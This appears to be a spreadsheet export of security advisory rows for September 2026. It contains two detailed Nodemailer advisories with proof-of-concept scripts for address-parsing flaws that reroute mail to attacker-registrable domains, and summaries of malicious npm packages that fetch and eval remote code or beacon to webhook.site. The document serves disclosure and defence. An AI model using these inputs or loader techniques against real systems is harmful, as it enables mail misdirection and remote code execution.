## Source: amazon-inspector (558344f06c374c5eff9c870250d63a5e9f784ffe23f91182154d9c66c441ee0b)
The package was found to contain malicious code or consuming dependency that contains malicious code

## Source: ghsa-malware (4708373dfb7211317f4ebae7bd11027043840e6db7a9f2d9aa3385611a2fdad8)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2" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16046</t></is></c></row><row r="1663"><c r="A1663" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1663" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1663" s="5" t="inlineStr"><is><t>GHSA-cc9r-2j5m-2m83</t></is></c><c r="D1663" s="5" t="inlineStr" /><c r="E1663" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1663" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1663" s="5" t="inlineStr" /><c r="H1663" s="5" t="inlineStr" /><c r="I1663" s="5" t="inlineStr" /><c r="J1663" s="5" t="inlineStr" /><c r="K1663" s="5" t="inlineStr" /><c r="L1663" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M1663" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N1663" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1663" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1663" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1663" s="5" t="inlineStr" /><c r="R1663" s="5" t="inlineStr" /><c r="S1663" s="5" t="inlineStr"><is><t>### Summary

Nodemailer's email-address parser treats an **RFC 5322 comment** `( ... )` inside the domain as a point to **concatenate** the surrounding text, rather than as folding whitespace (CFWS) that **terminates** the domain. Consequently a recipient address such as `user@good-corp.com(x)evil.com` is parsed and **delivered to `good-corp.comevil.com`** (registrable domain `comevil.com`, attacker‑controlled), while a conformant RFC 5322 parser terminates the domain at the comment and reads `good-corp.com`.

An application that decides *whether it is allowed to email a recipient* by parsing/validating the recipient's domain — with a strict RFC 5322 parser (used without inspecting parse defects) or with a naive prefix/substring allow‑list — and then hands the raw address to Nodemailer for delivery, can be induced to send mail to a domain the attacker controls. This is an **Interpretation Conflict (CWE‑436)**, the same class as CVE‑2025‑13033, reached through the RFC 5322 *comment* construct (the "Comments" technique in PortSwigger's *Splitting the email atom* research, which produced a Postfix fix).

Severity is **Moderate**: exploitation requires the app's domain check to disagree with Nodemailer (see **Impact** for exactly which parsers do and do not). Verified end‑to‑end against a real RFC 5321 SMTP server (nodemailer 9.0.6 → `aiosmtpd`).

### Details

Root cause is in `lib/addressparser/index.js`.

1. The tokenizer registers the comment as an operator pair (`Tokenizer.operators`):
   ```js
   '(': ')',            // line ~331
   ```
2. When the **closing** `)` is immediately followed by a non‑break character (anything other than space / tab / CR / LF / `,` / `;`), the tokenizer marks that operator token with `noBreak = true`:
   ```js
   // Tokenizer.checkChar, lines ~398-399
   if (nextChr &amp;&amp; ![' ', '\t', '\r', '\n', ',', ';'].includes(nextChr)) {
       this.node.noBreak = true;
   }
   ```
3. `_handleAddress` then **glues** the token that follows the comment onto the token that preceded it (dropping the comment):
   ```js
   // _handleAddress, lines ~187-188
   if (prevToken &amp;&amp; prevToken.noBreak &amp;&amp; data[state].length) {
       data[state][data[state].length - 1] += token.value;   // &lt;-- concatenation
   }
   ```

For the input `user@good-corp.com(x)evil.com` the tokens are `text:"user@good-corp.com"`, `op:"("`, `text:"x"`, `op:")"` (flagged `noBreak`), `text:"evil.com"`. Step 3 appends `evil.com` onto `user@good-corp.com`, producing the single domain **`good-corp.comevil.com`**. The comment content (`x`) is discarded into the display‑name field.

RFC 5322 defines a comment as CFWS — semantically folding whitespace — and it may **not** appear inside a `dot-atom`. A comment therefore *separates* tokens and terminates the domain; the conformant reading of `good-corp.com(x)evil.com` is the domain `good-corp.com` (with the trailing `evil.com` being invalid/ignored). Nodemailer instead concatenates the two atoms across the removed comment, yielding a different, attacker‑registrable domain.

Nodemailer uses the parsed address for **both** the SMTP envelope (`getEnvelope()` → `RCPT TO`) and the emitted `To:`/`From:` headers, so the entire message is routed to the concatenated domain.

**Related grammar defect (bonus, lower impact):** nested comments are legal in RFC 5322, but the tokenizer closes the comment at the *first* `)` (`chr === this.operatorExpecting`, line ~392), so a valid nested comment such as `user@x.com(a(b)c)` is mis‑balanced and mangled to `x.comc)`. That particular output contains a stray `)` and is **rejected** by a conformant MTA (501) — a bounce/robustness issue, not a misroute.

**Suggested fix:** treat a comment as folding whitespace that terminates the current token — i.e. do **not** propagate `noBreak` across a comment‑closing `)` (restrict the `noBreak` optimization to quoted‑string closes), and support nested comments per RFC 5322. Equivalently, never emit a domain formed by concatenating two atoms that were separated only by a comment.

### PoC

Environment: Node.js ≥ 18 and the published `nodemailer@9.0.6`. No special transport configuration is required; the discrepancy is in address parsing.

`poc-comment.js`:
```js
'use strict';
const net = require('net');
const nodemailer = require('nodemailer'); // 9.0.6

const TRUSTED   = 'good-corp.com';
const RECIPIENT = 'user@good-corp.com(x)evil.com'; // RFC 5322 comment (x) between two domains

//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'app@good-corp.com', to: RECIPIENT, subject: 'hi', text: 'x' });
  t.close(); server.close();
});
```

Run:
```
npm init -y &amp;&amp; npm install nodemailer@9.0.6
node poc-comment.js
```

Actual output (nodemailer 9.0.6):
```
nodemailer transmits : RCPT TO:&lt;user@good-corp.comevil.com&gt;
```

The application asked to mail `user@good-corp.com(x)evil.com`; Nodemailer delivers to `good-corp.comevil.com` — registrable domain `comevil.com`, which an attacker can register.

**Verified against a real RFC 5321 server** (containerized lab included with this report — `docker compose up --build`, case `R8_comment_glue`, receiver = `aiosmtpd`):
```
wire RCPT TO                     : RCPT TO:&lt;user@good-corp.comevil.com&gt;
real server                      : ACCEPTED (250)
recipient parsed by real server  : user@good-corp.comevil.com   (domain good-corp.comevil.com)
delivered To header              : x &lt;user@good-corp.comevil.com&gt;
```

**Which parser sees what** (the crux of exploitability):

| Parser used by the application to gate/route | Domain it reads from `user@good-corp.com(x)evil.com` | Deceived? |
|---|---|---|
| Python `email.policy.default` (strict RFC 5322) | `good-corp.com` *(flags `InvalidHeaderDefect`)* | Yes, if defects are not checked |
| Naive prefix / substring allow‑list (`startsWith`/`includes('@good-corp.com')`) | `good-corp.com` | Yes |
| Nodemailer's own `addressparser` | `good-corp.comevil.com` | No |
| Python `email.utils.getaddresses` | `good-corp.comevil.com` | No |
| WHATWG `url.domainToASCII` | `good-corp.com(x)evil.com` | No |

### Impact



* **Who is impacted:** applications that make a security or routing decision on the recipient **domain** using a parser that terminates the domain at the comment, while relying on Nodemailer for delivery — specifically those that validate with a strict RFC 5322 parser **without inspecting parse defects**, or with a **prefix/substring/allow‑list** check (e.g. "only send to `@good-corp.com`", employee‑only flows, "same‑tenant" routing). Applications that validate with Nodemailer's own `addressparser`, `email.utils.getaddresses`, or `url.domainToASCII` are **not** affected, which is why this is rated below the IDN/Punycode issue.

## Patched in 9.1.0

Fixed in [902b63e](https://github.com/nodemailer/nodemailer/commit/902b63e).

Not propagating `noBreak` across the closing `)` on its own breaks valid addresses, because CFWS is legal on either side of the `@`: `user@(x)good-corp.com` and `user(x)@good-corp.com` both come out mangled. A comment now joins what it separates only when one side carries the `@`, so those keep resolving while `user@good-corp.com(x)evil.com` terminates at `good-corp.com`.

Quoted-string and angle-address joining are unchanged. Nested comments are still not modelled, but the misroute is gone: `user@x.com(a(b)c)` now yields `user@x.com`.</t></is></c><c r="T1663" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-cc9r-2j5m-2m83</t></is></c></row><row r="1664"><c r="A1664" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1664" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1664" s="5" t="inlineStr"><is><t>GHSA-f4f2-cqqp-jcrx</t></is></c><c r="D1664" s="5" t="inlineStr" /><c r="E1664" s="5" t="inlineStr" /><c r="F1664" s="5" t="inlineStr" /><c r="G1664" s="5" t="inlineStr" /><c r="H1664" s="5" t="inlineStr" /><c r="I1664" s="5" t="inlineStr" /><c r="J1664" s="5" t="inlineStr" /><c r="K1664" s="5" t="inlineStr" /><c r="L1664" s="5" t="inlineStr"><is><t>npm:@web2apk/baileys</t></is></c><c r="M1664" s="5" t="inlineStr" /><c r="N1664" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1664" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1664" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1664" s="5" t="inlineStr" /><c r="R1664" s="5" t="inlineStr" /><c r="S1664" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (1ad4c3329ebb2fdeb3b9ddc93abcb5f3dab6773f7a7999ff96d063d49edc04d9)
The package was found to contain malicious code or consuming dependency that contains malicious code

## Source: ghsa-malware (23d279de5770039164036b3717fa8188b73601e773d8647f1a4e1b6ac59c5a17)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4" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16043</t></is></c></row><row r="1665"><c r="A1665" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1665" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1665" s="5" t="inlineStr"><is><t>GHSA-j95f-988m-3j2f</t></is></c><c r="D1665" s="5" t="inlineStr" /><c r="E1665" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1665" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1665" s="5" t="inlineStr" /><c r="H1665" s="5" t="inlineStr" /><c r="I1665" s="5" t="inlineStr" /><c r="J1665" s="5" t="inlineStr" /><c r="K1665" s="5" t="inlineStr" /><c r="L1665" s="5" t="inlineStr"><is><t>npm:@tiptap/core</t></is></c><c r="M1665" s="5" t="inlineStr"><is><t>3.30.5</t></is></c><c r="N1665" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1665" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1665" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1665" s="5" t="inlineStr" /><c r="R1665" s="5" t="inlineStr" /><c r="S1665" s="5" t="inlineStr"><is><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is></c><c r="T1665" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-j95f-988m-3j2f</t></is></c></row><row r="1666"><c r="A1666" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1666" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1666" s="5" t="inlineStr"><is><t>GHSA-mqvm-gmc4-6rv2</t></is></c><c r="D1666" s="5" t="inlineStr" /><c r="E1666" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1666" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1666" s="5" t="inlineStr" /><c r="H1666" s="5" t="inlineStr" /><c r="I1666" s="5" t="inlineStr" /><c r="J1666" s="5" t="inlineStr" /><c r="K1666" s="5" t="inlineStr" /><c r="L1666" s="5" t="inlineStr"><is><t>NuGet:Microsoft.DiaSymReader.Native</t></is></c><c r="M1666" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N1666" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1666" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1666" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1666" s="5" t="inlineStr" /><c r="R1666" s="5" t="inlineStr" /><c r="S1666" s="5" t="inlineStr"><is><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is></c><c r="T1666" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-mqvm-gmc4-6rv2</t></is></c></row><row r="1667"><c r="A1667" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1667" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1667" s="5" t="inlineStr"><is><t>GHSA-q72m-f2r4-w4cw</t></is></c><c r="D1667" s="5" t="inlineStr" /><c r="E1667" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1667" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1667" s="5" t="inlineStr" /><c r="H1667" s="5" t="inlineStr" /><c r="I1667" s="5" t="inlineStr" /><c r="J1667" s="5" t="inlineStr" /><c r="K1667" s="5" t="inlineStr" /><c r="L1667" s="5" t="inlineStr"><is><t>NuGet:Microsoft.DiaSymReader.Native</t></is></c><c r="M1667" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N1667" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1667" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1667" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1667" s="5" t="inlineStr" /><c r="R1667" s="5" t="inlineStr" /><c r="S1667" s="5" t="inlineStr"><is><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is></c><c r="T1667" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-q72m-f2r4-w4cw</t></is></c></row><row r="1668"><c r="A1668" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1668" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1668" s="5" t="inlineStr"><is><t>GHSA-rgj7-g3m4-5g8c</t></is></c><c r="D1668" s="5" t="inlineStr" /><c r="E1668" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1668" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1668" s="5" t="inlineStr" /><c r="H1668" s="5" t="inlineStr" /><c r="I1668" s="5" t="inlineStr" /><c r="J1668" s="5" t="inlineStr" /><c r="K1668" s="5" t="inlineStr" /><c r="L1668" s="5" t="inlineStr"><is><t>npm:sharp</t></is></c><c r="M1668" s="5" t="inlineStr"><is><t>0.35.4</t></is></c><c r="N1668" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1668" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1668" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1668" s="5" t="inlineStr" /><c r="R1668" s="5" t="inlineStr" /><c r="S1668" s="5" t="inlineStr"><is><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is></c><c r="T1668" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-rgj7-g3m4-5g8c</t></is></c></row><row r="1669"><c r="A1669" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1669" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1669" s="5" t="inlineStr"><is><t>GHSA-v3f6-m9j2-437p</t></is></c><c r="D1669" s="5" t="inlineStr" /><c r="E1669" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1669" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1669" s="5" t="inlineStr" /><c r="H1669" s="5" t="inlineStr" /><c r="I1669" s="5" t="inlineStr" /><c r="J1669" s="5" t="inlineStr" /><c r="K1669" s="5" t="inlineStr" /><c r="L1669" s="5" t="inlineStr"><is><t>NuGet:Microsoft.AspNetCore.Server.IISIntegration</t></is></c><c r="M1669" s="5" t="inlineStr"><is><t>10.0.12, 11.0.0-rc.1, 8.0.31, 9.0.20</t></is></c><c r="N1669" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1669" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1669" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1669" s="5" t="inlineStr" /><c r="R1669" s="5" t="inlineStr" /><c r="S1669" s="5" t="inlineStr"><is><t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-8cp2-47hg-mfgh. This link is maintained to preserve external references.

### Original Description
Improper handling of highly compressed data (data amplification) in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1669" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-v3f6-m9j2-437p</t></is></c></row><row r="1670"><c r="A1670" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1670" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1670" s="5" t="inlineStr"><is><t>GHSA-wmmp-3585-3rmp</t></is></c><c r="D1670" s="5" t="inlineStr" /><c r="E1670" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1670" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1670" s="5" t="inlineStr" /><c r="H1670" s="5" t="inlineStr" /><c r="I1670" s="5" t="inlineStr" /><c r="J1670" s="5" t="inlineStr" /><c r="K1670" s="5" t="inlineStr" /><c r="L1670" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M1670" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N1670" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1670" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1670" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1670" s="5" t="inlineStr" /><c r="R1670" s="5" t="inlineStr" /><c r="S1670" s="5" t="inlineStr"><is><t>### Summary

Nodemailer resolves an international (IDN / non-ASCII) recipient **domain** to a different Punycode `xn--` label than every UTS‑46‑conformant parser (web browsers, the WHATWG URL Standard, Node's `url.domainToASCII`, Python's `idna`). Its address normalizer (`_normalizeAddress` in `lib/mime-node/index.js`) uses the bundled **raw RFC‑3492 Punycode codec with no UTS‑46 mapping/normalization**, so a domain that a standards‑compliant validator maps to a trusted domain is delivered by Nodemailer to a **different, attacker‑registrable domain**.

An application that applies a domain allow‑list / same‑domain check to a recipient using a normal IDN‑aware parser (or that shows the normalized recipient to a user for confirmation) and then relies on Nodemailer to deliver to that domain can be induced to send email to an **unintended external domain**. This is the same weakness class as CVE‑2025‑13033 (Interpretation Conflict, CWE‑436) but reached through IDN/Punycode rather than quoted local‑parts, and it is not addressed by the 7.0.7 fix.

Because the mismatch can be triggered with an **invisible** character (U+00AD SOFT HYPHEN) that UTS‑46 folds away to the *exact* trusted domain string, no visible look‑alike/homograph is required.

### Details

`lib/mime-node/index.js` → `_normalizeAddress(address)` (around lines 1307–1346) splits the address at the last `@` and normalizes the domain like this:

```js
// lib/mime-node/index.js
try {
    if (/[\x80-￿]/.test(user)) {
        encodedDomain = punycode.toUnicode(domain.toLowerCase());   // line ~1338
    } else {
        encodedDomain = punycode.toASCII(domain.toLowerCase());     // line ~1340
    }
} catch (_err) {
    // keep domain as supplied
}
return `${this._normalizeLocalPart(user)}@${encodedDomain}`;         // line ~1346
```

`punycode` here is the project’s bundled codec (`lib/punycode/`), which is a **pure RFC 3492 (Punycode) implementation**. The only normalization applied to the domain is `.toLowerCase()`. It performs **none of the UTS‑46 “IDNA2008 + compatibility processing” steps** that browsers and DNS‑facing resolvers apply before Punycode encoding, specifically:

* removing **Ignored** code points such as `U+00AD` SOFT HYPHEN,
* **Mapping** full‑width / compatibility characters to their canonical ASCII forms,
* Unicode **NFC** normalization,
* validity checks.

As a result, for any domain containing a UTS‑46‑mapped or ‑ignored character, Nodemailer’s `punycode.toASCII(...)` produces a **different A‑label** than `url.domainToASCII(...)` (Node ≥ 7 / WHATWG), `new URL('http://'+domain)`, browsers, and Python’s `idna` (`uts46=True`). Nodemailer then uses its A‑label as:

* the SMTP envelope recipient written to the wire as `RCPT TO:&lt;local@xn--…&gt;` (`getEnvelope()` → `lib/smtp-connection/index.js` `_setEnvelope`), **and**
* the address emitted in the `To:` / `From:` headers (`_convertAddresses`).

So the domain a standards‑compliant validator computes and the domain Nodemailer actually delivers to **disagree**, on a syntactically valid, validator‑accepted address. Concrete divergences (verified on 9.0.6):

| recipient (raw) | UTS‑46 parser (`url.domainToASCII`) | Nodemailer delivers to |
|---|---|---|
| `victim@compa{U+00AD}ny.com` (invisible soft hyphen) | `company.com` | `xn--company-pka.com` |
| `victim@ｃｏｍｐａｎｙ.com` (full‑width) | `company.com` | `xn--mi7cd4afch9d.com` |
| `user@exámple.com` (NFD `a`+U+0301) | `xn--exmple-qta.com` | `xn--example-vge.com` |

This is the “Punycode / IDN parser discrepancy” technique documented in PortSwigger’s *Splitting the email atom* research (which produced e.g. Joomla CVE‑2024‑21725 and fixes in the PHP `idna_convert` library). The fix for CVE‑2025‑13033 (nodemailer 7.0.7) hardened the *quoted‑local‑part* path only; this IDN path is independent and still present in **9.0.6 (latest)** and, given the long‑standing use of the bundled RFC‑3492 codec, earlier releases.

**Suggested remediation:** perform UTS‑46 processing before/at domain encoding so Nodemailer’s resolution matches browsers, validators, and DNS — e.g. use the runtime’s `url.domainToASCII()` (available since Node 7) instead of the raw `punycode.toASCII`, and decode with the matching UTS‑46 `domainToUnicode`. At minimum, reject a domain whose value changes under UTS‑46 mapping (i.e. `punycode.toASCII(d)` ≠ `url.domainToASCII(d)`).

### PoC

Environment: Node.js ≥ 18, the published `nodemailer@9.0.6`. No special configuration; the discrepancy is in domain normalization itself.

`poc-idn.js`:

```js
'use strict';
const net = require('net');
const url = require('url');
const nodemailer = require('nodemailer'); // 9.0.6

const TRUSTED   = 'company.com';                        // the only domain the app will mail
const RECIPIENT = 'victim@compa\u00ADny.com';           // attacker input: invisible U+00AD inside "company"

// The app's domain allow-list check, done the standard (UTS-46 / browser / WHATWG) way:
const seen = url.domainToASCII(RECIPIENT.split('@').pop());
console.log('validator (url.domainToASCII) sees:', JSON.stringify(seen),
            seen === TRUSTED ? '=&gt; ALLOWED (equals trusted domain)' : '');

// A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'app@company.com', to: RECIPIENT, subject: 'reset your password', text: 'secret link' });
  t.close(); server.close();
});
```

Run:

```
npm init -y &amp;&amp; npm install nodemailer@9.0.6
node poc-idn.js
```

Actual output (Nodemailer 9.0.6):

```
validator (url.domainToASCII) sees: "company.com" =&gt; ALLOWED (equals trusted domain)
nodemailer transmits             : RCPT TO:&lt;victim@xn--company-pka.com&gt;
```

The application’s domain check approves `company.com`, but the message is sent to `xn--company-pka.com` — a **different domain an attacker can register** — carrying the `To:` header `&lt;victim@xn--company-pka.com&gt;` as well.

A containerized version that proves the same result against a **real RFC 5321 SMTP server** (`aiosmtpd`) is included alongside this report (`docker compose up --build`, cases `R6`/IDN); the receiving server accepts `RCPT TO:&lt;victim@xn--company-pka.com&gt;` and reports the recipient domain as `xn--company-pka.com`.

### Impact

Any application that uses Nodemailer to send mail to a recipient whose domain is subjected to a security or trust decision made with a *different* (UTS‑46‑conformant) parser, and then trusts Nodemailer to deliver to that domain. This includes:
  * recipient **allow‑list / block‑list / “same corporate domain” checks** implemented with `new URL()`, `url.domainToASCII`, a browser‑side check, or an IDN library;
  * flows that **display or log the normalized recipient domain** for human confirmation (the shown `company.com` differs from the delivered `xn--company-pka.com`);
  * any domain‑gated feature (employee‑only registration, “send only to our tenant”, notification routing).

## Patched in 9.1.0

Domain encoding now applies UTS-46 ([259c32d](https://github.com/nodemailer/nodemailer/commit/259c32d)), so `victim@compa­ny.com` resolves to `company.com`, matching `url.domainToASCII` and browsers.

One caveat on the suggested remediation, hardened in [b212ac4](https://github.com/nodemailer/nodemailer/commit/b212ac4): `url.domainToASCII` is a WHATWG **host parser**, not a pure UTS-46 mapper. It terminates the host at `/`, `\\`, `?` and `#` and percent-decodes. Used unguarded it introduces a worse version of the same weakness, since `user@attacker.example/mail.corp.example` encodes to the deliverable `user@attacker.example` where the bundled Punycode codec left it intact and unroutable. Those characters are now kept away from the mapper.

On severity, "attacker-registrable" is doing significant work in the report: `xn--company-pka.com` decodes to a label containing U+00AD and `xn--mi7cd4afch9d.com` to full-width Latin, neither of which Verisign's IDN tables permit for a .com registration. The misdelivery and the confirmation-UI mismatch stand regardless, which is why this is rated level with the comment issue rather than above it.</t></is></c><c r="T1670" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-wmmp-3585-3rmp</t></is></c></row><row r="1671"><c r="A1671" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1671" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1671" s="5" t="inlineStr"><is><t>MAL-2026-16048</t></is></c><c r="D1671" s="5" t="inlineStr" /><c r="E1671" s="5" t="inlineStr" /><c r="F1671" s="5" t="inlineStr" /><c r="G1671" s="5" t="inlineStr" /><c r="H1671" s="5" t="inlineStr" /><c r="I1671" s="5" t="inlineStr" /><c r="J1671" s="5" t="inlineStr" /><c r="K1671" s="5" t="inlineStr" /><c r="L1671" s="5" t="inlineStr"><is><t>npm:punypump</t></is></c><c r="M1671" s="5" t="inlineStr" /><c r="N1671" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1671" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1671" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1671" s="5" t="inlineStr" /><c r="R1671" s="5" t="inlineStr" /><c r="S1671" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (6e56cc14096d20f679823bf15af9f44dff039e01f23d2082eba8020200d04a7f)
The package presents itself as a console shim (index.js is a verbatim copy of console-browserify with description 'Emulate console for all the browsers'), but also ships library.js and test/sessionCtrl.js which auto-execute a stager on module load via initializeService().catch(...). The stager fetches an opaque blob from a base64-hidden URL (config.API_GATEWAY = 'aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9WNk5CWA==' decoding to https://www.jsonkeeper.com/b/V6NBX), AES-256-CBC decrypts it with a hardcoded key, and passes the plaintext to eval(). The endpoint URL, HTTP header name, and header value are all base64-encoded in config.js. Content served from the jsonkeeper.com paste is mutable and attacker-controlled, so require('punypump/library') runs arbitrary attacker code on the installer's machine.
</t></is></c><c r="T1671" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16048</t></is></c></row><row r="1672"><c r="A1672" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1672" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1672" s="5" t="inlineStr"><is><t>MAL-2026-16049</t></is></c><c r="D1672" s="5" t="inlineStr" /><c r="E1672" s="5" t="inlineStr" /><c r="F1672" s="5" t="inlineStr" /><c r="G1672" s="5" t="inlineStr" /><c r="H1672" s="5" t="inlineStr" /><c r="I1672" s="5" t="inlineStr" /><c r="J1672" s="5" t="inlineStr" /><c r="K1672" s="5" t="inlineStr" /><c r="L1672" s="5" t="inlineStr"><is><t>npm:tailwindcss-aspectratio-styles</t></is></c><c r="M1672" s="5" t="inlineStr" /><c r="N1672" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1672" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1672" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1672" s="5" t="inlineStr" /><c r="R1672" s="5" t="inlineStr" /><c r="S1672" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (9b995eb02f80f9037beda9f8a864f55109e054925175289df0c1b29ed8011bc3)
src/index.js, referenced by the package main and executed on require(), performs an HTTP GET to http://tailwindlan.online, writes the response body to a sibling file, and immediately require()s that file, giving the operator of tailwindlan.online arbitrary code execution in the installer's Node.js process at import time. The fetch uses plain HTTP with no integrity or signature check, and the domain is unrelated to the tailwindlabs project. The package name resembles the official @tailwindcss/aspect-ratio plugin, and package.json's repository field points at tailwindlabs/tailwindcss-aspect-ratio to mimic the upstream; the legitimate plugin code is preserved verbatim with the remote-fetch-and-execute block appended to the end of the single minified line.
</t></is></c><c r="T1672" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16049</t></is></c></row><row r="1673"><c r="A1673" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1673" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1673" s="5" t="inlineStr"><is><t>MAL-2026-16050</t></is></c><c r="D1673" s="5" t="inlineStr" /><c r="E1673" s="5" t="inlineStr" /><c r="F1673" s="5" t="inlineStr" /><c r="G1673" s="5" t="inlineStr" /><c r="H1673" s="5" t="inlineStr" /><c r="I1673" s="5" t="inlineStr" /><c r="J1673" s="5" t="inlineStr" /><c r="K1673" s="5" t="inlineStr" /><c r="L1673" s="5" t="inlineStr"><is><t>npm:@aspect-adv-ui/consent-manager</t></is></c><c r="M1673" s="5" t="inlineStr" /><c r="N1673" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1673" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1673" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1673" s="5" t="inlineStr" /><c r="R1673" s="5" t="inlineStr" /><c r="S1673" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b30b507d6c71f746b0af2d19cbbb85357f15189e7e93118c75b4cb215adc0ece)
@aspect-adv-ui/consent-manager 2.4.1 declares a postinstall hook (`node setup.js`) that fires automatically on every `npm install`. setup.js issues an HTTPS GET to a hardcoded webhook.site inspection endpoint (https://webhook.site/kapper), sending install-event metadata (source IP, TLS/user-agent fingerprint) to an author-controlled third-party collector. The package is advertised as a small GDPR/CCPA consent-bar React component with no native build, no binary, and no legitimate install-time work; the postinstall exists solely to run this beacon. webhook.site is a public request-inspection service commonly used as an anonymous exfiltration/beacon endpoint, and the beacon is not disclosed or opt-in.
